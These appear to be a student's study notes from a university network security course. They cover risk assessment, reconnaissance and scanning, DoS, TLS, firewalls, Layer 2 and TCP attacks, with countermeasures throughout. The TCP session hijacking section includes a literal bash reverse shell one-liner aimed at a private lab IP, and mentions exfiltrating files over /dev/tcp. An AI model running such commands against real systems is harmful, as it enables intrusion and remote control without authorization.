Notes from the Network Security course at NYU by Phillip Mak

The Basics

  • Risk Management: Avoid, Mitigate, Transfer(Insurance, to another department, outsource), Accept
  • Quantitative Risk Assessment:
    • Exposure Factor (EF) = Percentage of asset lost by identified threat
    • Single Loss Expectancy (SLE) = Asset Value * Exposure Factor
    • Annualized Rate of Occurrence (ARO) = Estimated frequency a threat will occur in a year
    • Annualized Lost Expectancy = ARO * SLE
  • Qualitative Risk Assessment: Likelihood * Consequence
  • Delphi - NIST recommended way to get scoring about likelihood and consequence, 3 independent experts. If the results are too varied, do another round with more information.

Recon

  • Combination of social engineering to achieve a goal
    • Example: Twitter compromise of @mat wired magazine guy using gmail, domain name, me, amazon, apple
  • Google dorks: https://www.exploit-db.com/google-hacking-database
  • edgar.gov to find a company’s public information (SEC details)
  • Spoof caller id for social engineering
  • Maltego - osint engine for domain names, DNS info, netblocks, IP addresses, email addresses, websites, phone numbers, companies, social media
  • https://geospy.web.app/
  • whois lookup
  • dns lookups
  • osintframework.com
  • Registered ip blocks and more information from arin.net (for america) etc
    • can then probably scan it using nmap - the addresses that are not being used
  • do dns lookup - figure out A and MX records
  • robtex.com - to figure out graph of domain records
  • censys.io
  • Figured out using traceroute that palo alto firewall is being used and nysernet.org is the ISP being used
  • shodan.io
  • Network Recon: Host Discovery
    • Ping sweep (ping all IPs in a range)
    • Zone transfer using dig
    • Brute force forward DNS (dnsmap)(subdomain enumeration)
    • Prevention: Split DNS implemented by modern DNS servers, splits queries from internal and external network. Help avoid leak info about internal IPs and thus prevent DNS rebinding attacks.
  • Network Recon: Service Discovery
    • hping is a good, fast utility to send custom packets. scapy is slow. nmap for automated scanning of ports
    • Port scanning by sending TCP and UDP packets to various ports:
      • Can get SYN-ACK = Open
      • RST = Closed
      • DROP = Firewalled/Network Issue
      • REJECT = (might get an ICMP unreachable resp to a TCP req or Network Issue) (Usually firewall letting you know you can’t access)
      • UDP Port Closed gets an ICMP unreachable packet.
      • UDP Port Scanning is more complicated because you need to send the right packet to the right service. Will get no response sending a DHCP packet to a DNS port. Will also not get a response if the packet was blocked (firewall) or some network issue occurred. Or ICMP unreachable limit has been reached. (Linux has limit of sending 1 ICMP Unreachable per second → this makes it very slow to scan UDP ports)
      • UDP Scanning: Simple request response (DNS, NTP) on success, ICMP destination unreachable on closed port (ICMP unreachable sending has a limit to prevent DDOS thus this limits the number of closed ports you can see)
    • Nmap:
      • TCP Connect Scan: connect() syscall (no root req)
      • TCP SYN scan: Half open scan. Only cares about SYN and SYN-ACK (half open, thus significantly faster) (root permissions req)
      • TCP FIN scan: FIN to target, closed ports give back RST
      • TCP NULL scan: No flags set. For some hosts, closed ports will return RST
      • TCP ACK scan: RST → Port is open or closed, but likely stateless firewall or no firewall. Good to do a normal SYN scan alongside it to get more info from the comparison. Stateless firewalls only leak this stuff.
      • TCP XMAS scan: FIN, URG, PSH flags set. Closed ports return RST.
      • FTP Proxy “bounce attack” - bounce an attack from a poorly configured ftp server
      • Version scanning
      • Fragmented scan
      • TCP Seq Prediction
      • TCP Idle scan: Hide scan source. Can be done to prevent IDS from detecting nmap scans - Using a zombie machine to send packet to target and figuring out open, closed based on (IP Identifier)
    • Firewalk: Legit UDP services (like DNS with custom TTL) can be used to figure out when regular traceroute is blocked by the firewall. Figure out which Layer3/4 ACLs are present on filtering routers and firewalls. Uses TCP and UDP.
  • Web Recon
    • httprecon: Web server fingerprinting
    • vega: Web app vulnerability tester
  • Geolocation
    • Wi-Fi positioning system (WPS)
      • https://www.wigle.net/
      • Data collectors such as Google, Apple, Microsoft, and WPS providers keep large databases of information that pair Wi-Fi networks with geographical locations.
    • Server Based Geolocation
      • Server-based geolocation determines your device’s location based on its IP address through a wireless or wired connection.
      • whatismyipaddress.com
    • Device Based Geolocation - GPS
  • FaceID

Exploitation

  • IP Address Spoofing: Prevent tracing the actions back to attacker
  • FTP Proxy bounce attack
  • Ingress Filtering: Ensure that incoming packets are actually from where they claim to be. To prevent IP spoofing, block packets if it thinks they’re spoofed. Tier 1 ISPs (AT&T, Verizon) usually do it by preventing packets that are not destined to the addresses they own, or counter - the address that it knows a network owns. Regional ISPs don’t do it these days, so can spoof other networks in the region.
  • Egress Filtering: Almost never done, prevent packets from leaving its network
  • Session Hijacking: Take control of one side of a TCP connection by sniffing and spoofing. Remove Alice out of the network to maintain control after the session hijacking attack using DDOS attack, vuln attack, ARP cache poisoning, deauthentication attack to knock out from Wifi. Otherwise the ACK from Bob to Alice will cause TCP Retransmissions and hang.
  • DOS attacks:
    • Connection flooding: Flood with syn connections to exhaust half-open connection limit. Prevented by SYN cookies and connection cache
    • Bandwidth flooding; Vulnerability attacks; Fragmentation related issues are common since fragmentation is complicated - Land, Ping of death, Jolt2
    • Teardrop, NewTear, Bonk, Syndrop: IP fragmentation attack to make the target consume all its resources by doing the impossible task of trying to reassemble overlapping fragments sent by the attacker.
    • DNS/NTP reflection attack: Spoof victim’s IP and send DNS requests which the DNS servers respond to the victim. 100byte request can lead to 512 byte response to the victim. Amplifying using other servers. Same thing can be done with NTP monlist packets. Prevention by filtering dangerous packets, over-provisioning of resources, signature and anomaly detection, rate limiting.
  • DNS Redirection Attack (Hijacking): Reply to DNS requests from victim with your own fake IP - Require IP address spoofing, match reply ID with request ID (easy to get if we capture traffic), Send reply faster than legit server. The browser may show a certificate mismatch or “insecure site”
  • Web Client side attacks: Fake URLs (Phishing using cyrillic characters, hidden links etc)
  • Vulnerability Scanners:
    • Nessus, OpenVAS
    • Nikto - Web Vulnerability Scanner
  • Exploitation Tools:
    • Immunity Canvas
    • Core Impact
    • Metasploit (learning resource: metasploit unleashed)
  • Rootkits: HackerDefender (Kernel mode rootkit)
  • Client Side Exploits - Much more common than Network side exploits these days - Browser attacks, Java attacks, etc

Post-Exploitation

  • Persistence: To attack other systems, manipulation and destruction of data
    • Startup Services
    • Trojans using Wrappers to evade AVs (Hidden programs that run in the background of other programs)
    • Rootkits (Can go on as deep as the MBR, Firmware, Hypervisor
    • Hiding files with Alternative Data Streams (ADS). Prevented using file integrity checking, Host based IDS
  • Removing Forensic Evidence: Edit/Delete log files
    • Defended against by forwarding logs to central server, encrypting logs, make them append-only, restrictive permissions. Using SIEMs
  • Exfiltration: Often uses steganography (covert channel to transmit information hidden within legitimate channel)
    • Create a tunnel under HTTP (80), SSH, GRE
    • covert_tcp: hide data within the TCP protocol header. (can hide in icmp request packet data, identifier/seq number, frequency of pings or timing of packets can be an indicator). Detection of it can involve checking sequence numbers and making sure it increments and analysing ping payload data. IP ID, Seq #, ACK # using bounce
    • loki2: Hide information in ICMP echo and reply packets
    • Reverse WWW shell: C&C over HTTP - looks like normal traffic
    • Advanced exfil using DNS, HTTP, Email, Pastebin, Dropbox
  • DLP - Data Loss Prevention (to prevent data from accidentally or intentionally leaving the network) - email filters, usb checks, etc - prevent exfiltration using regex, keywords, host and network based
  • Useful utilities: netcat

PKI/TLS

  • ARP cache poisoning AITM works in real life, you can change DNS to point to an unencrypted website and then see everything
  • Diffie-Hellman can be AITMed by having the attacker generate two different sets of keys and giving Alice and Bob different keys
    • This flaw of DH that the keys of A and B are different from each other and enable an AITM brings the need for an extra protocol - commonly RSA
    • Values that are being exchanged just need to be signed, not encrypted necessarily - done using RSA [since integrity is the issue, not confidentiality]
    • Then the shared key K is used for AES encryption.
  • This is the typical flow used in web security. AES is used for encryption because it is significantly faster than RSA.
  • HMAC is a keyed hash (symmetric key), Digital Signature is private key + hash [the hash is encrypted using the pvt key]
  • Digital Signatures - Encrypted hash of the message (sign the hash with the private key so that anyone that has public key knows it came from you)
  • Fingerprints - hash of the certificate
  • Basic constraints: whether its a CA or not
  • The whole certificate is digitally signed by Issuer’s private key
  • Website Certificate Subject common name doesn’t matter anymore(deprecated), Subject Alt Name is what’s used these days
  • For CAs, Subject Common name does matter.
  • Certificate issuance for websites usually works by putting something in the DNS - implicit assumption on web that if you control the DNS, you control the domain
  • Within an email - usually along with message and digital signature, certificate is sent that sends Alice’s public key as well so that Bob can verify
  • HMAC is normally used for verifying that Alice and Bob have the correct key
  • Playback Attack - Trudy replays a message again and again - both digital signatures and hmacs are susceptible to it
    • Nonces can prevent replay attacks. With the nonce, B knows the other host A is alive
  • Encrypted Email uses double RSA encryption to encrypt a symmetric key (AES) and share it and then uses the AES key to actually encrypt the message
  • Types of TLS certs - DV, OV, EV (Domain Validation, Organization V, Extended V) (based on things that are validated)
  • Till years ago, EV certs used to have a green padlock. Now it has been phased out and we can’t tell what type of cert is being used in a website.
  • TLS has 4 protocols -
  • TLS handshake happens after TCP handshake completes and connection is established.
  • SSL = TLS (Name was changed about 10 years ago)
  • TLS Handshake
    1. Client Hello: Client→Server - Version, Ciphersuite, Client Random, Session ID (for resume), Options
    2. Server Hello: Server→Client - Selects a ciphersuite
    3. Certificate: Server→Client - Send public key (then client makes sure that the cert is valid)
    4. Server Key Exchange: Server→Client - For ephemeral key exchange (DHE: A, g, n - digitally signed with private key of server)
    5. Server Hello Done: Server→Client
    6. Client Key Exchange: Client → Server - Send key exchange data (DHE: B - digitally signed with public key of server obtained from certificate)
    7. ChangeCipherSpec: Client→Server - “I’m ready to start encryption”
    8. Finished: Client→Server - Hash of all the previous handshake messages (1-6) (first encrypted message by client)
    9. ChangeCipherSpec: Server→Client: Server will now activate encryption
    10. Finished: Server→Client - Hash of all the prior handshake messages (ChangeCipherSpec messages are not handshake messages) (1 to 6 and 8)
  • TLS Abbreviated Handshake: Session resumption because creating a new session is an expensive process. Bypasses the certificate validation which is an expensive process.
    1. ClientHello: Sends session ID
    2. ServerHello: Checks session ID to see if it remembers (usually remembers for 15 seconds of previous connection)
    3. ChangeCipherSpec: Server→Client
    4. Finished: Server→Client
    5. ChangeCipherSpec: Client→Server
    6. Finished: Client→Server
  • Client sends finished first in full, server sends in abbreviated
  • SSL Cipher Suites
    • TLS_DHE_RSA_WITH_AES_128_CBC_SHA256: Use DHE protected by RSA (from MITM) to generate a bulk encryption AES128 CBC mode key. SHA256 is a keyed hash HMAC used for protecting the integrity of the messages (confidentiality is already protected using the bulk encryption but the attacker can modify ciphertext to break its integrity, that’s why HMAC is needed). After Diffie-Hellman, the key generated is actually the PMS (pre-master secret), that key is used to generate two keys - the AES128 key and the SHA256 HMAC key.
    • TLS_RSA_AES_128_GCM_SHA256: Since there’s no Diffie Hellman, the ServerKeyExchange step is empty. In ClientKeyExchange, client just takes a Key K and encrypts it with the server public key and sends it to the server.
  • Diffie-Hellman without ephemeral is not used these days. In that (A, g, n) were stored in the public cert itself. (a) was stored in the private cert. Fixed Diffie-Hellman is bad because it violates perfect forward secrecy. If tomorrow, private cert gets leaked, attacker will be able to generate the bulk encryption key since they have a and decrypt old ciphertext. With ephemeral DH, the keys are not re-used and thus leakage of new key won’t lead to old encrypted communication being attacked. In TLS_RSA_WITH_AES_128_CBC_SHA256 this is also a problem since the bulk encryption key is encrypted with the RSA private key and sent from client to server.
  • (Encrypt then HMAC) is best compared to (HMAC then Encrypt) or (Encrypt and HMAC) because the decryption engine won’t be used if the hash doesn’t match. TLS 1.3 uses Encrypt then HMAC. TLS 1.2 and below uses HMAC then encrypt.
  • SSL Alert Protocol: Used when problem with the connection (like TCP Reset)
  • TLS 1.3 only allows ciphers that have perfect forward secrecy
  • TLS 1.3 Handshake is much quicker because keys are shared in ClientHello itself. Also more secure. But a lot of websites still use 1.2 today. Key exchange is combined with Hellos. Certificate is combined with Hello for server too.
    • In the ClientHello for TLS 1.3, version is still 1.2 and then extension SupportedVersion:TLS1.3 is used to specify that it is supported. This is to handle legacy systems and not break 1.2.
  • Attacks:
    • MITM: Version Rollback attack: force the client to offer an earlier version of SSL that has vulnerabilities
    • MITM: CipherSpec rollback: force the client to offer weaker version of ciphers so it can be broken easier
    • Install a malicious CA on your device
    • TCP reset attack - break the SSL connection
    • DOS using predicting sequence number, SSL will ignore it, TCP will accept
  • SSLStrip - HTTP Downgrade attack - attacker needs to be in a mitm - either by arp spoofing, etc
    • attacker might end up having a https session with the server if the server forces it, but tries to have http only communication with the client
    • attacker will force alice to have an http session. so verifying server cert won’t be required.
  • TLS/TCP: TLS expects a close_notify TLS message before the TCP connection ends. If the TCP RST comes before close_notify, then there is something wrong, such as an attacker.
  • Mutual authentication using PKI: Alice→Server: Nonce R; Server→Alice: Encrypted(R) and then reverse with another nonce
  • CBC mode ensures that same plaintext will generate different ciphertext because of the random IV
  • Certificate Transparency Log: Prevent spoofing of certificates by having a public log of all certificates (submitted by CAs, verified by browser)
  • does expired cert still do encryption? yes.

Firewalls

  • Used for microsegmentation as well - separate networks for different projects in an org
  • Inspect traffic that goes through it and only allow some to pass
  • Packet filter firewall: (Traditional)
    • fast, stateless firewall (look at the packet and make the decision to allow/deny)
    • very efficient if simple rules are used
    • can’t do complex logic (like user logins on ssh)
  • Stateful firewall: Keep track of connection states and timeout entries after an interval
  • Proxies (Application Gateway):
    • A server used as an intermediary (FTP proxies, mail servers) between user and service to inspect and improve.
    • Can do malware scanning, heuristic analysis, DLP (Data Loss Prevention), etc on the incoming data
    • For decrypting SSL connections, proxy uses the fact that it is a CA trusted by your browser. decrypts traffic and resigns it to seem it came from amazon.
  • Bastion Host: Host designed to withstand attacks
  • DMZ (Demilitarized Zone or Perimeter Network): Separate from the internal network and the internet, put forward facing web servers in here
  • ACLs: Access Control Lists (packet filter firewall applied to usually non-firewall devices)
  • IPTables: GUI to linux netfilter firewall (FILTER, NAT, MANGLE, RAW tables)
    • FILTER table: 3 chains - INPUT, OUTPUT, FORWARD
    • Host-based firewall: Traffic is only in (INPUT CHAIN) or out (OUTPUT chain) (care about only one interface)
    • Network-based firewall: Apart from in and out, it is also forwarded between interfaces (FORWARD chain)
    • INPUT chain: packets destined for the firewall
    • OUTPUT chain: packets originating from the firewall
    • FORWARD chain: firewall is neither the source ip or the dest ip
    • Once an iptables rule matches, it stop processing it. thus order of the rules is important.
    • Only for special rules does processing continue (special rules like LOG)
    • iptables default policy should always be set for /each chain/ (best practice is to DROP by default (-P). order doesn’t matter but conventionally written at the top.
    • REJECT vs DROP: reject sends an ICMP unreachable packet back. DROP just drops the packet.
    • -m conntrack : connection tracking for stateful firewall
    • iptables -A INPUT -s 10.10.10.0/24 --dport 443 -j accept -m conntrack --ctstate NEW, ESTABLISHED
      • allow new connections and established connection packets from that source to 443 port
    • iptables -p icmp -h to find out all icmp related iptables options
    • iptables -P INPUT DROP : set default policy on input chain to drop
    • iptables can be used to limit network traffic - eg, limit the number of ping packets getting into the internal network (iptables -m limit -h)
    • can be used to log packets: iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j LOG --log-prefix "IP_SPOOF A: "

Layer 2 Security

  • Layer 2 Protocols have no protection at all since there’s no encryption, no authentication, etc

MAC attacks

  • CAM table attack - Mapping between physical port (Layer 1) and MAC address (Layer 2)
  • Physical memory, limited in size, thus susceptible to overflow attacks
  • CAM Overflow Attack: Send junk data to the switch to fill its memory. Once memory is full, it will start acting like a hub (will send out data on each port)
  • Countermeasure: Port Security - limits the number of source mac addresses on a port (basically bind the mac address to that port for some amount of time, time known as CAM Aging time)
  • Why port security isn’t implemented: Clients will be unable to switch between ports, these days there’s lots of virtualization so a virtual machine might send a different mac address. Lot of overhead to make things function. Plugging into another ethernet port will shut down the port.
  • Syslog from Switch to a SIEM is a better way to handle these attacks.

VLAN hopping attacks

  • Trunk port (as opposed to Access Port): Allow multiple VLANs to communicate on 1 link (like the trunk of a tree)(uses a VLAN tag)
  • Switch Spoofing attack: Make the switch connected to the trunk think that you are also a switch, then get trunking.
    • Auto-trunking was turned on by default previously, nowadays has been changed.
  • VLAN Hopping attack: Change the VLAN of your packet using double encapsulation
    • Attacker needs to be on the native VLAN (VLAN 1). Possible since on a network, some machines are on VLANs, others are not explicitly configured so they might end up being on VLAN 1.
    • Double 802.1q Encapsulation: Valid attack nowadays too. Attacker needs to be part of native VLAN (usually VLAN1)
    • Mitigation: VLAN 1 has management traffic, do not use VLAN 1 for user traffic

DHCP Attacks

  • DORA: Discover, Offer, Request, Acknowledge
  • DHCP Header has a copy of the source mac address in it in the CHADDR (Client Hardware Address) field. This field is required because the packet may go into another subnet through a router.
  • DHCP Starvation Attack: Attacker takes up all of the available DHCP IP addresses using various random source mac addresses.
    • DHCP Gobbler looks at the whole scope and tries to lease all the available DHCP addresses so that DOS happens (server assigns it to the mac address, so random mac addresses required)
    • Easy to do attack, works today
    • To Prevent: Port Security - limit the number of source mac addresses from the ethernet header - this won’t stop gobbler though since it has random mac addresses in the CHADDR field even though a constant MAC address in the ethernet header source field.
    • DHCP Nack can be sent to the client by the attacker, this will force the client to resend the DHCP discover broadcast message using which attacker can use to become mitm.
  • Become a rogue DHCP server and give out bad information to the clients requesting DHCP leases - change default gateway, dns server, etc
    • Can change default gateway and become the MITM
    • Can change the DNS server and point to phishing websites and steal credentials
    • Prevention: DHCP snooping;
    • DHCP snooping creates DHCP Snooping/Binding table (table built by snooping the DHCP reply to the client)
    • Set interface on DHCP server to be trusted or non-trusted; untrusted can only send discover and request, Trusted can send offer, ack, nack
      • memory of mac address, ip address, lease time
      • thus figures out issues in the network
      • Matches the mac address from ethernet header and DHCP header
    • Prevention 2: Block packets from clients from destination Port 68 (Offer/Ack/Nack messages are sent to port 68). Now only legit DHCP server will be allowed to send those.

ARP Attacks

  • Ettercap for ARP attacks
  • Gratuitous ARP replies (allowed in ARP RFC, but might be practically disabled on devices)
  • Countermeasure to ARP Attacks: Dynamic ARP Inspection (DAI) (Available on expensive CISCO devices)
    • Uses DHCP Snooping binding table. Inspect ARP packets and match with DHCP snooping binding table.

Spoofing Attacks

  • IP Spoofing - very easy
  • Countermeasures:
    • IP Source Guard (IPSG): Looks at source IP address of every packet and compares with DHCP snooping binding table.
    • Present in very expensive devices. Very CPU and memory intensive.

Other Layer 2 protocols:

  • Spanning Tree Protocol (STP): Used within enterprises to create a loop free topology by electing root switches.
    • Attack: Attacker can send BPDU messages and say I have the highest bandwidth etc I’ll become root.
    • Mitigation:
      • BPDU Guard: ensures that you only get BPDU messages from other switches.
      • Root Guard: limits the number of devices that can become root.

TCP and its Attacks

  • TCP is a connection oriented protocol. Always need to establish handshake before sending data.
  • OS assigns a random port to clients when they call connect
  • Server usually needs two sockets for TCP - one to bind to (and listen) and one for each incoming connection (fd returned by accept)
  • TCP has sequence numbers in its headers to place the packets correctly
  • Not every packet is acknowledged, the receiver just sends the last received sequence number to intend that everything before that has been received correctly.

Attacks

  • SYN Flooding: Details about half-open connections are stored in a Transmission Control Block (TCB) on the server. Half open connections means that SYN has been received by the server and SYN-ACK has been sent but ACK has not been received yet. The goal is to fill up the half-open connections in the queue so it cannot accept any more new connections. If the client finishes the 3-way handshake, the record will not be in the TCB anymore since it will no longer be a half-open connection. Server receiving RST will also dequeue the record. Timeout is the only defense. Firewalls are a defense but by using random source IPs, they can be avoided. The random IPs won’t likely exist so ACK won’t come, but RST will, thus the record will dequeue. The countermeasure is enabled by default in modern OSes, it is to drop allocating of resources for all SYNs once it detects that there’s too many half open connections. Then it uses Syn cookies to prevent ACK flooding/spoofing.
  • TCP Reset Attack: There’s two ways to close a connection - Fin→Ack→Fin→Ack or RST from one side. This attack takes advantage of the RST way. Spoof a packet from A to B and send RST to B. It will break up the connection of A and B. SSH connection can also be broken because SSH does encryption at the transport layer. So only the data in the TCP packet is encrypted, the headers are not. We can spoof using the obtained sequence number from the headers and drop a connection using the RST packet with those details. Video streaming like Youtube, Netflix can likely also be stopped using this if you have a fast program (python might be too slow) to sniff and spoof the packet to an RST packet.
  • TCP Session Hijacking: TCP Session is uniquely identified by Source and Destination IP and Ports (Signature of TCP session). A relatively correct sequence number is also required, otherwise receiver will discard the data. Steal a file using session hijacking by printing it and redirecting the output to /dev/tcp/ip/port using the bash command. The actual connection freezes after session hijacking because the legit user and server sequence numbers get mismatched. bash reverse shell: \r /bin/bash -i > /dev/tcp/172.16.0.192/9090 2>&1 0<&1 \r
  • You can take Alice offline to prevent session hijacking from being stopped in 1 command.
  • Or you can do an MITM (AITM) attack, everything Alice does is in full control of the attacker now (like a proxy)

DNS

DNS Servers

  • Recursive DNS Server - Usually maintained by ISP or Open-DNS or Google DNS
  • Root Name DNS Server - One of the 13 root name servers present on the internet across the world. Gives result for the .edu TLD server
  • Top Level Domain Name Server (TLD) - .edu TLD server gives IP for nyu.edu dns server
  • Authoritative Name Server - Query nyu.edu for the IP of engineering.nyu.edu for the final request

Records

  • DNS Records = Zone files
  • A record: IP address of a domain
  • CNAME: CNAME record points to the root domain (for engineering.nyu.edu CNAME is nyu.edu) (Used to forward domains to other domains. how?)
  • MX Record: Mail Exchanger records - direct mail to another server
  • TXT Record: Let users store text in txt records

Packet Analysis

Wireshark

  • To filter out a particular image from an HTTP stream, filter out the stream and then File→Export Object→HTTP
  • Same can be done to analyse objects transferred through SAMBA or SMB2
  • TLS traffic can be decrypted in wireshark if RSA private key or Pre-Master-Secret log file is present.
    • Set the log file by going to Edit→Preferences→TLS

BPF Filters

  • Structure: <qualifier> <qualifier> <id>
  • Components: type (host/net/port/portrange), direction(src/dst/src or host/src and dst) and protocol (ether/tcp/udp/ip/ip6/..)
  • Syntax cheat sheet:

BPF syntax

TCPDump

  • -w write packets to pcap file
  • -r to read a pcap file
  • -n to prevent it from converting IPs to names
  • apply a filter directly after reading it: ex - tcpdump -r myfile.pcap ip host 1.1.1.1

Zeek